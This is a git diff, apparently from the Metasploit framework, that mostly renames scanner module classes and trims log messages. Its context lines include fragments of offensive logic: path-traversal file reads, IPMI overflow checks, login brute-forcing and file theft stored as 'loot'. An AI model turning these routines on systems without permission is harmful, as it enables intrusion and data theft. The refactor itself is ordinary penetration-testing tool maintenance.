206f7f416f..cb90ba8639 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -119,18 +119,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...") + vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? - vprint_good("#{peer} - Supermicro IPMI web interface found") + vprint_good("Supermicro IPMI web interface found") else - vprint_error("#{peer} - Supermicro IPMI web interface not found") + vprint_error("Supermicro IPMI web interface not found") return end - vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result - print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, @@ -140,10 +140,10 @@ class Metasploit3 < Msf::Auxiliary }) end - vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result - print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index e145de83eb..b5ed85615d 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index d7873f017b..ad85196211 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary travs << "../" * datastore['DEPTH'] travs << file - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi({ "uri" => "/cgi/url_redirect.cgi", @@ -111,26 +111,26 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Checking if it's a #{APP_NAME}....") + print_status("Checking if it's a #{APP_NAME}....") if is_supermicro? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - #{APP_NAME} not found") + print_error("#{APP_NAME} not found") return end - print_status("#{peer} - Login into the #{APP_NAME}...") + print_status("Login into the #{APP_NAME}...") session = login if session.nil? - print_error("#{peer} - Failed to login, check credentials.") + print_error("Failed to login, check credentials.") return else - print_good("#{peer} - Login successful, session: #{session}") + print_good("Login successful, session: #{session}") end contents = read_file(datastore['FILEPATH'], session) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index adc6eb3a10..7b79dae7cf 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index b9deea0f9c..17ef2fb7bd 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 35833d09af..329a3d0257 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 77969a4f9e..0e51d19f55 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket/range_walker' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 56a0b065c0..043a2942e9 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index fb132e01e5..2ac6033fb3 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL @@ -38,56 +38,65 @@ class Metasploit4 < Msf::Auxiliary connect(true, {"SSL" => true}) #Force SSL - cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + if sock.respond_to? :peer_cert + cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + end disconnect if cert - print_status("#{ip}:#{rport} Subject: #{cert.subject}") - print_status("#{ip}:#{rport} Issuer: #{cert.issuer}") - print_status("#{ip}:#{rport} Signature Alg: #{cert.signature_algorithm}") - public_key_size = cert.public_key.n.num_bytes * 8 - print_status("#{ip}:#{rport} Public Key Size: #{public_key_size} bits") - print_status("#{ip}:#{rport} Not Valid Before: #{cert.not_before}") - print_status("#{ip}:#{rport} Not Valid After: #{cert.not_after}") + print_status("Subject: #{cert.subject}") + print_status("Issuer: #{cert.issuer}") + print_status("Signature Alg: #{cert.signature_algorithm}") + + # If we use ECDSA rather than RSA, our metrics for key size are different + public_key_size = 0 + if cert.public_key.respond_to? :n + public_key_size = cert.public_key.n.num_bytes * 8 + print_status("Public Key Size: #{public_key_size} bits") + end + print_status("Not Valid Before: #{cert.not_before}") + print_status("Not Valid After: #{cert.not_after}") # Checks for common properties of self signed certificates caissuer = (/CA Issuers - URI:(.*?),/i).match(cert.extensions.to_s) if caissuer.to_s.empty? - print_good("#{ip}:#{rport} Certificate contains no CA Issuers extension... possible self signed certificate") + print_good("Certificate contains no CA Issuers extension... possible self signed certificate") else - print_status("#{ip}:#{rport} " +caissuer.to_s[0..-2]) + print_status(caissuer.to_s[0..-2]) end if cert.issuer.to_s == cert.subject.to_s - print_good("#{ip}:#{rport} Certificate Subject and Issuer match... possible self signed certificate") + print_good("Certificate Subject and Issuer match... possible self signed certificate") end alg = cert.signature_algorithm if alg.downcase.include? "md5" - print_status("#{ip}:#{rport} WARNING: Signature algorithm using MD5 (#{alg})") + print_status("WARNING: Signature algorithm using MD5 (#{alg})") end vhostn = nil cert.subject.to_a.each do |n| vhostn = n[1] if n[0] == 'CN' end - if public_key_size == 1024 - print_status("#{ip}:#{rport} WARNING: Public Key only 1024 bits") - elsif public_key_size < 1024 - print_status("#{ip}:#{rport} WARNING: Weak Public Key: #{public_key_size} bits") + if public_key_size > 0 + if public_key_size == 1024 + print_status("WARNING: Public Key only 1024 bits") + elsif public_key_size < 1024 + print_status("WARNING: Weak Public Key: #{public_key_size} bits") + end end if cert.not_after < Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid anymore") + print_status("WARNING: Certificate not valid anymore") end if cert.not_before > Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid yet") + print_status("WARNING: Certificate not valid yet") end if vhostn - print_status("#{ip}:#{rport} has common name #{vhostn}") + print_status("Has common name #{vhostn}") # Store the virtual hostname for HTTP report_note( @@ -125,7 +134,7 @@ class Metasploit4 < Msf::Auxiliary end else - print_status("#{ip}:#{rport}] No certificate subject or common name found") + print_status("No certificate subject or common name found") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index ee3e135338..40b22af0f8 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary { 'SSL' => true, 'RPORT' => 443, - 'SSLVersion' => 'SSL3' }, 'References' => [ @@ -43,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]) + Opt::SSLVersion ] ) diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index ad2a235717..cccf57bee8 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary uri = target_uri.path peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Retrieving cookie") + vprint_status("Retrieving cookie") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "") @@ -57,10 +57,10 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 session = res.get_cookies else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end - vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + vprint_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "j_security_check"), @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 302 - vprint_status("#{peer} - Login succesful") + vprint_status("Login succesful") else - vprint_error("#{peer} - Login was not succesful!") + vprint_error("Login was not succesful!") return end randomname = Rex::Text.rand_text_alphanumeric(10) - vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "WorkOrder.do"), @@ -114,21 +114,21 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 - vprint_status("#{peer} - Ticket created") + vprint_status("Ticket created") if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) fileid = $1 - vprint_status("#{peer} - File ID is [ #{fileid} ]") + vprint_status("File ID is [ #{fileid} ]") fileauthkey = $2 - vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + vprint_status("Auth Key is [ #{fileauthkey} ]") else - vprint_error("#{peer} - File ID and AuthKey not found!") + vprint_error("File ID and AuthKey not found!") end else - vprint_error("#{peer} - Ticket not created due to error!") + vprint_error("Ticket not created due to error!") return end - vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary data, datastore['FILE'] ) - print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]") else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end end end diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 1c2f5a2132..be40bb0c17 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index 3a388d677a..f15b931185 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index 3c141366c7..d8e49a4e95 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 82b8f3d7f4..b48d8560ae 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -111,10 +111,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Unable to download the file. The server timed out.") + print_error("Unable to download the file. The server timed out.") return elsif res and res.body.empty? - print_error("#{peer} - File not found or empty.") + print_error("File not found or empty.") return end @@ -123,24 +123,24 @@ class Metasploit3 < Msf::Auxiliary f = ::File.basename(fname) p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f) - print_good("#{peer} - File saved as: '#{p}'") + print_good("File saved as: '#{p}'") end def run_host(ip) sid, last_login = get_login_data if sid.empty? or last_login.empty? - print_error("#{peer} - Missing required login data. Cannot continue.") + print_error("Missing required login data. Cannot continue.") return end username = datastore['USERNAME'] password = datastore['PASSWORD'] if not auth(username, password, sid, last_login) - print_error("#{peer} - Unable to login. Cannot continue.") + print_error("Unable to login. Cannot continue.") return else - print_good("#{peer} - Logged in as '#{username}:#{password}'") + print_good("Logged in as '#{username}:#{password}'") end fname = datastore['FILENAME'] diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 53af795bcb..4f702e5cc1 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) end diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4918004f32..580ab2f489 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 4b573346ae..d7f662fce7 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient # Scanner mixin should be near last @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]), - OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]), OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]), OptString.new('TARGETURI', [true, 'The base path', '/']) ], self.class) @@ -35,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary end def run - if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false - print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.") + if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES'] + print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.") else super end @@ -51,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary # If no response, quit now if res.nil? - print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No response") return end @@ -65,12 +64,12 @@ class Metasploit3 < Msf::Auxiliary server_header = val if key.downcase == 'server' end else - print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No HTTP headers") end # If the body is blank, just stop now as there is no chance of a title if res.body.nil? - print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage body") return end @@ -78,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary # there is no chance that we will have a title rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*}im.match(res.body.to_s) unless rx - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") return end @@ -86,13 +85,15 @@ class Metasploit3 < Msf::Auxiliary rx[:title].strip! if rx[:title] != '' rx_title = Rex::Text.html_decode(rx[:title]) - print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true - if datastore['STORE_NOTES'] == true + if datastore['SHOW_TITLES'] + print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") + end + if datastore['STORE_NOTES'] notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] } report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data) end else - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") end end diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 9a4c1e244f..314f77b7f2 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS') end def has_j_security_check? diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 6847640f9c..58e644bda0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/tomcat' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index c4541ac09f..1bcadbbde9 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] vprint_good("#{rhost}:#{rport} - Response - File #{file}:") res.body.each_line do |line| # the following is the last line of the useless response @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary end out = false end - elsif (res and res.code) + elsif res && res.code vprint_error("#{rhost}:#{rport} - File->#{file} not found") end end diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 86472e9648..192a7cb395 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 188088b406..ab57d7cee5 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index c94347a9f9..2d035a031d 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Typo3 include Msf::Auxiliary::Report @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Trying to bruteforce login") + print_status("Trying to bruteforce login") res = send_request_cgi({ 'method' => 'GET', @@ -67,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary end def try_login(user, pass) - vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'") + vprint_status("Trying username:'#{user}' password: '#{pass}'") cookie = typo3_backend_login(user, pass) if cookie - print_good("#{peer} - Successful login '#{user}' password: '#{pass}'") + print_good("Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'") + vprint_error("failed to login as '#{user}' password: '#{pass}'") return end end diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 5c14785e1e..674b7dd855 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary begin sid = get_sid if sid.nil? - vprint_error("#{peer} - Failed to get sid") + vprint_error("Failed to get sid") return :abort end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => sid }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Auxiliary when /User name already confirmed/ return :skip_user when /Invalid password/ - vprint_status("#{peer} - Username found: #{user}") + vprint_status("Username found: #{user}") when /\/ - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body) return :next_user end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 48df7dd5e2..6a881c119d 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 4d0484a96a..cea5ea796e 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -13,7 +13,7 @@ require 'cgi' - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb index 163932d52a..399ce2cfc9 100644 --- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb +++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 9e768085ce..32f96c8d11 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 74bf30c54b..9c79ae64a4 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < 